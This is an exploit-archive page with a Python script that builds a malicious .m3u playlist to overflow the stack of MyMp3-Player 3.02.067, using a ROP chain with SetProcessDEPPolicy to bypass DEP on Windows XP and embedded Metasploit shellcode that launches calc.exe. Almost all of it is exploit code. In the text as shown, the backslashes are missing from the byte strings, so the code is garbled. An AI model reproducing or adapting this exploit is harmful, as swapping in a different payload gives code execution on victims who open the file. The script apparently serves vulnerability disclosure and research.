MyMp3 Player Stack .m3u DEP Bypass Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MyMp3 Player Stack .m3u DEP Bypass Exploit
# Published : 2012-07-23
# Author :
# Previous Title : CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit
# Next Title : quicktime.util.QTByteObject Initialization Security Checks Bypass

'''
Title: MyMp3-Player '.m3u' Stack BOF (Bypass DEP)
Author: Daniel Romero Perez (@daniel_rome)
Software & Version: MyMp3-Player 3.02.067
Tested on: Windows XP SP3 - ES
Mail: unlearnsecurity@gmail.com
Blog: unlearningsecurity.blogspot.com
Advisor: http://www.securityfocus.com/bid/38835/info
Article: http://unlearningsecurity.blogspot.com.es/2012/07/bypass-dep-no-permanente-con.html
'''
import os
import struct

# Buffer 
Buff = "x41" * 1024

# ShellCode (ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b 'x0ax0dx20x00' -t c) - 227 bytes
ShellCode = ("xb8xf8x16x8ax64xd9xe9xd9x74x24xf4x5ex2bxc9xb1"
	"x33x31x46x12x83xc6x04x03xbex18x68x91xc2xcdxe5"
	"x5ax3ax0ex96xd3xdfx3fx84x80x94x12x18xc2xf8x9e"
	"xd3x86xe8x15x91x0ex1fx9dx1cx69x2ex1ex91xb5xfc"
	"xdcxb3x49xfex30x14x73x31x45x55xb4x2fxa6x07x6d"
	"x24x15xb8x1ax78xa6xb9xccxf7x96xc1x69xc7x63x78"
	"x73x17xdbxf7x3bx8fx57x5fx9cxaexb4x83xe0xf9xb1"
	"x70x92xf8x13x49x5bxcbx5bx06x62xe4x51x56xa2xc2"
	"x89x2dxd8x31x37x36x1bx48xe3xb3xbexeax60x63x1b"
	"x0bxa4xf2xe8x07x01x70xb6x0bx94x55xccx37x1dx58"
	"x03xbex65x7fx87x9bx3ex1ex9ex41x90x1fxc0x2dx4d"
	"xbax8axdfx9axbcxd0xb5x5dx4cx6fxf0x5ex4ex70x52"
	"x37x7fxfbx3dx40x80x2ex7axbexcax73x2ax57x93xe1"
	"x6fx3ax24xdcxb3x43xa7xd5x4bxb0xb7x9fx4exfcx7f"
	"x73x22x6dxeax73x91x8ex3fx10x74x1dxa3xf9x13xa5"
	"x46x06")
	
Nops = "x90" * 50
	
##ROP --> Bypass DEP with SetProcessDEPPolicy
ROP = struct.pack('<L',0x77f4c25f) # POP EBX / RET
ROP += struct.pack('<L',0x41414141) # JUNK
ROP += struct.pack('<L',0xFFFFFFFF) # PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF
ROP += struct.pack('<L',0x7e810b7e) # INC EBX / RET
ROP += struct.pack('<L',0x77f445bf) # POP EBP / RET
ROP += struct.pack('<L',0x7C862144) # <- SetProcessDEPPolicy
ROP += struct.pack('<L',0x77f45493) # POP EDI / RET
ROP += struct.pack('<L',0x77f4108c) # RET
ROP += struct.pack('<L',0x77f4567e) # POP ESI  / RET
ROP += struct.pack('<L',0x77f4108c) # RET
ROP += struct.pack('<L',0x58c35ff7) # PUSHAD / RET

# Exploit
exploit = Buff + ROP + Nops + ShellCode

# Create File
file = open("exploit_mymp3-player_BOF.m3u", "wb")
file.write(exploit)
file.close()

print ("Your file has been generated successfully!!")